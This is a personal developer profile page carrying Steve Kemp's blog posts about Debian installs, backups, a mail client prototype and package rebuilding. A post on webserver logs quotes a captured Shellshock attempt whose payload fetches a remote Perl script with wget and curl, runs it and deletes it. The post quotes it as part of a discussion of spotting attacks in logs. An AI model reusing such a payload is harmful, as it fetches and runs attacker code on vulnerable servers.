Stevey is currently certified at Master level.

Name: Steve Kemp
Member since: N/A
Last Login: 2013-01-05 09:46:29

FOAF RDF Share This

Homepage: http://www.steve.org.uk/

Notes:

For the curious I live in Edinburgh, Scotland.

I'm a big believer in the benefits of the open source
software. I've written, or contributed, to a large
number of Open Source projects including GNU Emacs,
GNUTella, GoGo, GNUMP3d, MP3Blaster.

Nowadays I guess the most visible thing I do in my spare
time is run a site I created for Debian GNU/Linux system administration:

* http://www.debian-administration.org/

Projects

Articles Posted by Stevey

Recent blog entries by Stevey

Syndication: RSS 2.0

An anniversary and a retirement

On this day last year I we got married.

This morning my wife cooked me breakfast in bed for the second time in her life, the first being this time last year. In thanks I will cook a three course meal this evening.

 

In unrelated news the BlogSpam service will be retiring the XML/RPC API come 1st January 2015.

This means that any/all plugins which have not been updated to use the JSON API will start to fail.

Fingers crossed nobody will hate me too much..

Syndicated 2014-12-11 10:56:05 from Steve Kemp's Blog

I eventually installed Debian on a new desktop.

Recently I build a new desktop system. The hightlights of the hardware are a pair of 512Gb SSDs, which were to be configured in software RAID for additional speed and reliability (I'm paranoid that they'd suddenly stop working one day). From power-on to the (GNOME) login-prompt takes approximately 10 seconds.

I had to fight with the Debian installer to get the beast working though as only the Jessie Beta 2 installer would recognize the SSDs, which are Crucual MX100 devices. My local PXE-setup which deploys the daily testing installer, and the wheezy installer, both failed to recognize the drives at all.

The biggest pain was installing grub on the devices. I think this was mostly this was due to UFI things I didn't understand. I created spare partitions for it, and messaged around with grub-ufi, but ultimately disabled as much of the "fancy modern stuff" as I could in the BIOS, leaving me with AHCI for the SATA SSDs, and then things worked pretty well. After working through the installer about seven times I also simplified things by partitioning and installing on only a single drive, and only configured the RAID once I had a bootable and working system.

(If you've never done that it's pretty fun. Install on one drive. Ignore the other. Then configure the second drive as part of a RAID array, but mark the other half as missing/failed/dead. Once you've done that you can create filesystems on the various /dev/mdX devices, rsync the data across, and once you boot from the system with root=/dev/md2 you can add the first drive as the missing half. Do it patiently and carefully and it'll just work :)

There were some niggles though:

  • Jessie didn't give me the option of the gnome desktop I know/love. So I had to install gnome-session-fallback. I also had to mess around with ~/.config/autostart because the gnome-session-properties command (which should let you tweak the auto-starting applications) doesn't exist anymore.

  • Setting up custom keyboard-shortcuts doesn't seem to work.

  • I had to use gnome-tweak-tool to get icons, etc, on my desktop.

Because I assume the SSDs will just die at some point, and probably both on the same day, I installed and configured obnam to run backups. There is more testing and similar, but this is the core of my backup script:

  #!/bin/sh

# backup "/" - minus some exceptions.
obnam backup -r /media/backups/storage --exclude=/proc --exclude=/sys --exclude=/dev --exclude=/media /

# keep files for various periods
obnam forget --keep="30d,8w,8m" --repository /media/backups/storage

Syndicated 2014-12-07 08:12:46 from Steve Kemp's Blog

Paying attention to webserver logs

If you run a webserver chances are high that you'll get hit by random exploit-attempts. Today one of my servers has this logged - an obvious shellshock exploit attempt:

92.242.4.130 blog.steve.org.uk - [02/Dec/2014:11:50:03 +0000] \
"GET /cgi-bin/dbs.cgi HTTP/1.1" 404 2325 \
 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; wget http://146.71.108.154/pis ; \
curl -O http://146.71.108.154/pis;perl pis;rm -rf pis\"; node-reverse-proxy.js"

Yesterday I got hit with thousands of these referer-spam attempts:

152.237.221.99 - - [02/Dec/2014:01:06:25 +0000] "GET / HTTP/1.1"  \
200 7425 "http://buttons-for-website.com" \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

When it comes to stopping dictionary attacks against SSH servers we have things like denyhosts, fail2ban, (or even non-standard SSH ports).

For Apache/webserver exploits we have? mod_security?

I recently heard of apache-scalp which seems to be a project to analyse webserver logs to look for patterns indicative of attack-attempts.

Unfortunately the suggested ruleset comes from the PHP IDS project and are horribly bad.

I wonder if there is any value in me trying to define rules to describe attacks. Either I do a good job and the rules are useful, or somebody else things the rules are bad - which is what I thought of hte PHP-IDS set - I guess it's hard to know.

For the moment I look at the webserver logs every now and again and shake my head. Particularly bad remote IPs get firewalled and dropped, but beyond that I guess it is just background noise.

Shame.

Syndicated 2014-12-02 13:51:10 from Steve Kemp's Blog

Lumail 2.x ?

I've continued to ponder the idea of reimplementing the console mail-client I wrote, lumail, using a more object-based codebase.

For one thing having loosely coupled code would allow testing things in isolation, which is clearly a good thing.

I've written some proof of concept code which will allow the following Lua to be evaluated:

-- Open the maildir.
users = Maildir.new( "/home/skx/Maildir/.debian.user" )

-- Count the messages.
print( "There are " .. users:count() .. " messages in the maildir " .. users:path() )

--
-- Now we want to get all the messages and output their paths.
--
for k,v in ipairs( users:messages()) do
    --
    -- Here we could do something like:
    --
    --   if ( string.find( v:headers["subject"], "troll", 1, true ) ) then v:delete()  end
    --
    -- Instead play-nice and just show the path.
    print( k .. " -> " .. v:path() )
end

This is all a bit ugly, but I've butchered some code together that works, and tried to solicit feedback from lumail users.

I'd write more but I'm tired, and intending to drink whisky and have an early night. Today I mostly replaced pipes in my attic. (Is it "attic", or is it "loft"? I keep alternating!) Fingers crossed this will mean a dry kitchen in the morning.

Syndicated 2014-11-22 21:39:28 from Steve Kemp's Blog

An experiment in (re)building Debian

I've rebuilt many Debian packages over the years, largely to fix bugs which affected me, or to add features which didn't make the cut in various releases. For example I made a package of fabric available for Wheezy, since it wasn't in the release. (Happily in that case a wheezy-backport became available. Similar cases involved repackaging gtk-gnutella when the protocol changed and the official package in the lenny release no longer worked.)

I generally release a lot of my own software as Debian packages, although I'll admit I've started switching to publishing Perl-based projects on CPAN instead - from which they can be debianized via dh-make-perl.

One thing I've not done for many years is a mass-rebuild of Debian packages. I did that once upon a time when I was trying to push for the stack-smashing-protection inclusion all the way back in 2006.

Having had a few interesting emails this past week I decided to do the job for real. I picked a random server of mine, rsync.io, which stores backups, and decided to rebuild it using "my own" packages.

The host has about 300 packages installed upon it:

root@rsync ~ # dpkg --list | grep ^ii | wc -l
294

I got the source to every package, patched the changelog to bump the version, and rebuild every package from source. That took about three hours.

Every package has a "skx1" suffix now, and all the build-dependencies were also determined by magic and rebuilt:

root@rsync ~ # dpkg --list | grep ^ii | awk '{ print $2 " " $3}'| head -n 4
acpi 1.6-1skx1
acpi-support-base 0.140-5+deb7u3skx1
acpid 1:2.0.16-1+deb7u1skx1
adduser 3.113+nmu3skx1

The process was pretty quick once I started getting more and more of the packages built. The only shortcut was not explicitly updating the dependencies to rely upon my updages. For example bash has a Debian control file that contains:

Depends: base-files (>= 2.1.12), debianutils (>= 2.15)

That should have been updated to say:

Depends: base-files (>= 2.1.12skx1), debianutils (>= 2.15skx1)

However I didn't do that, because I suspect if I did want to do this decently, and I wanted to share the source-trees, and the generated packages, the way to go would not be messing about with Debian versions instead I'd create a new Debian release "alpha-apple", "beta-bananna", "crunchy-carrot", "dying-dragonfruit", "easy-elderberry", or similar.

In conclusion: Importing Debian packages into git, much like Ubuntu did with bzr, is a fun project, and it doesn't take much to mass-rebuild if you're not making huge changes. Whether it is worth doing is an entirely different question of course.

Syndicated 2014-11-20 13:28:36 from Steve Kemp's Blog

747 older entries...

 

Stevey certified others as follows:

  • Stevey certified skx as Master
  • Stevey certified zx80user as Journeyer
  • Stevey certified faw as Apprentice
  • Stevey certified Liedra as Journeyer
  • Stevey certified ladypine as Journeyer
  • Stevey certified Sarah as Apprentice
  • Stevey certified Ward as Master
  • Stevey certified chipx86 as Journeyer
  • Stevey certified johnnyb as Journeyer
  • Stevey certified perlpimp as Journeyer
  • Stevey certified CaptainNemo as Journeyer
  • Stevey certified mobius as Apprentice
  • Stevey certified tjansen as Journeyer
  • Stevey certified auspex as Apprentice
  • Stevey certified laymusic as Journeyer
  • Stevey certified apeiro as Journeyer
  • Stevey certified dneighbors as Master
  • Stevey certified alejandro as Journeyer
  • Stevey certified scandal as Master
  • Stevey certified moray as Journeyer
  • Stevey certified sacha as Apprentice
  • Stevey certified Malkin as Journeyer
  • Stevey certified dria as Journeyer
  • Stevey certified Jordi as Journeyer
  • Stevey certified Mysidia as Journeyer
  • Stevey certified dirtyrat as Journeyer
  • Stevey certified bdelacretaz as Apprentice
  • Stevey certified braden as Journeyer
  • Stevey certified pencechp as Apprentice
  • Stevey certified brouhaha as Journeyer
  • Stevey certified fejj as Journeyer
  • Stevey certified hanna as Apprentice
  • Stevey certified aero6dof as Apprentice
  • Stevey certified gman as Journeyer
  • Stevey certified dlecorfec as Apprentice
  • Stevey certified jpr as Journeyer
  • Stevey certified Pizza as Journeyer
  • Stevey certified kroah as Master
  • Stevey certified wingo as Journeyer
  • Stevey certified jwz as Master
  • Stevey certified ploppy as Master
  • Stevey certified nosinut as Journeyer
  • Stevey certified Radagast as Journeyer
  • Stevey certified Jody as Master
  • Stevey certified ariya as Apprentice
  • Stevey certified nausicaa as Journeyer
  • Stevey certified dan as Master
  • Stevey certified kappa as Apprentice
  • Stevey certified slamb as Apprentice
  • Stevey certified stevebaker as Journeyer
  • Stevey certified gregor as Journeyer
  • Stevey certified maelstorm as Apprentice
  • Stevey certified palm as Apprentice
  • Stevey certified Artimage as Journeyer
  • Stevey certified bluets as Apprentice
  • Stevey certified jds as Journeyer
  • Stevey certified steve as Apprentice
  • Stevey certified elanthis as Apprentice
  • Stevey certified afayolle as Journeyer
  • Stevey certified bonzini as Journeyer
  • Stevey certified jml as Apprentice
  • Stevey certified ciphergoth as Journeyer
  • Stevey certified Fefe as Master
  • Stevey certified Denny as Journeyer
  • Stevey certified sethcohn as Journeyer
  • Stevey certified bjf as Apprentice
  • Stevey certified sdodji as Journeyer
  • Stevey certified raph as Master
  • Stevey certified jarod as Apprentice
  • Stevey certified StevenRainwater as Journeyer
  • Stevey certified Surfr as Apprentice
  • Stevey certified rlevin as Journeyer
  • Stevey certified ike as Apprentice
  • Stevey certified ebf as Journeyer
  • Stevey certified chakie as Journeyer
  • Stevey certified gstein as Master
  • Stevey certified dtype as Apprentice
  • Stevey certified pompeiisneaks as Journeyer
  • Stevey certified acme as Master
  • Stevey certified lsdrocha as Apprentice
  • Stevey certified mjg59 as Journeyer
  • Stevey certified squrl as Journeyer
  • Stevey certified physos as Apprentice
  • Stevey certified rasmus as Master
  • Stevey certified jelle as Journeyer
  • Stevey certified chrisime as Journeyer
  • Stevey certified julian as Master
  • Stevey certified eliot as Journeyer
  • Stevey certified sh as Journeyer
  • Stevey certified mascot as Apprentice
  • Stevey certified SyntaxPolice as Journeyer
  • Stevey certified bytesplit as Apprentice
  • Stevey certified nymia as Journeyer
  • Stevey certified thomasvs as Master
  • Stevey certified Bram as Journeyer
  • Stevey certified pfremy as Apprentice
  • Stevey certified todd as Master
  • Stevey certified bma as Journeyer
  • Stevey certified coolvibe as Journeyer
  • Stevey certified deekayen as Journeyer
  • Stevey certified fxn as Journeyer
  • Stevey certified bgeiger as Apprentice
  • Stevey certified angelsun as Journeyer
  • Stevey certified andrelop as Apprentice
  • Stevey certified jono as Master
  • Stevey certified groom as Apprentice
  • Stevey certified axboe as Master
  • Stevey certified jennv as Journeyer
  • Stevey certified tseaver as Journeyer
  • Stevey certified duncanm as Apprentice
  • Stevey certified jc as Apprentice

Others have certified Stevey as follows:

  • fxn certified Stevey as Journeyer
  • wingo certified Stevey as Master
  • faw certified Stevey as Master
  • Liedra certified Stevey as Journeyer
  • ladypine certified Stevey as Journeyer
  • CaptainNemo certified Stevey as Journeyer
  • apeiro certified Stevey as Journeyer
  • dneighbors certified Stevey as Journeyer
  • Jordi certified Stevey as Journeyer
  • Mysidia certified Stevey as Master
  • braden certified Stevey as Journeyer
  • Chicago certified Stevey as Master
  • pencechp certified Stevey as Master
  • brouhaha certified Stevey as Master
  • wardv certified Stevey as Journeyer
  • Pizza certified Stevey as Master
  • jrf certified Stevey as Journeyer
  • ariya certified Stevey as Master
  • maelstorm certified Stevey as Journeyer
  • palm certified Stevey as Journeyer
  • alfie certified Stevey as Master
  • donscarletti certified Stevey as Master
  • afayolle certified Stevey as Journeyer
  • bonzini certified Stevey as Journeyer
  • ciphergoth certified Stevey as Journeyer
  • domi certified Stevey as Master
  • sdodji certified Stevey as Master
  • jarashi certified Stevey as Master
  • jarod certified Stevey as Master
  • ebf certified Stevey as Journeyer
  • lsdrocha certified Stevey as Master
  • alexm certified Stevey as Journeyer
  • richdawe certified Stevey as Journeyer
  • sh certified Stevey as Journeyer
  • mascot certified Stevey as Master
  • realblades certified Stevey as Apprentice
  • lerdsuwa certified Stevey as Master
  • bytesplit certified Stevey as Apprentice
  • thom certified Stevey as Master
  • coolvibe certified Stevey as Master
  • speeder certified Stevey as Master
  • broonie certified Stevey as Journeyer
  • angelsun certified Stevey as Journeyer
  • MAK certified Stevey as Master

[ Certification disabled because you're not logged in. ]

New Advogato Features

New HTML Parser: The long-awaited libxml2 based HTML parser code is live. It needs further work but already handles most markup better than the original parser.

Keep up with the latest Advogato features by reading the Advogato status blog.

If you're a C programmer with some spare time, take a look at the mod_virgule project page and help us with one of the tasks on the ToDo list!

X
Share this page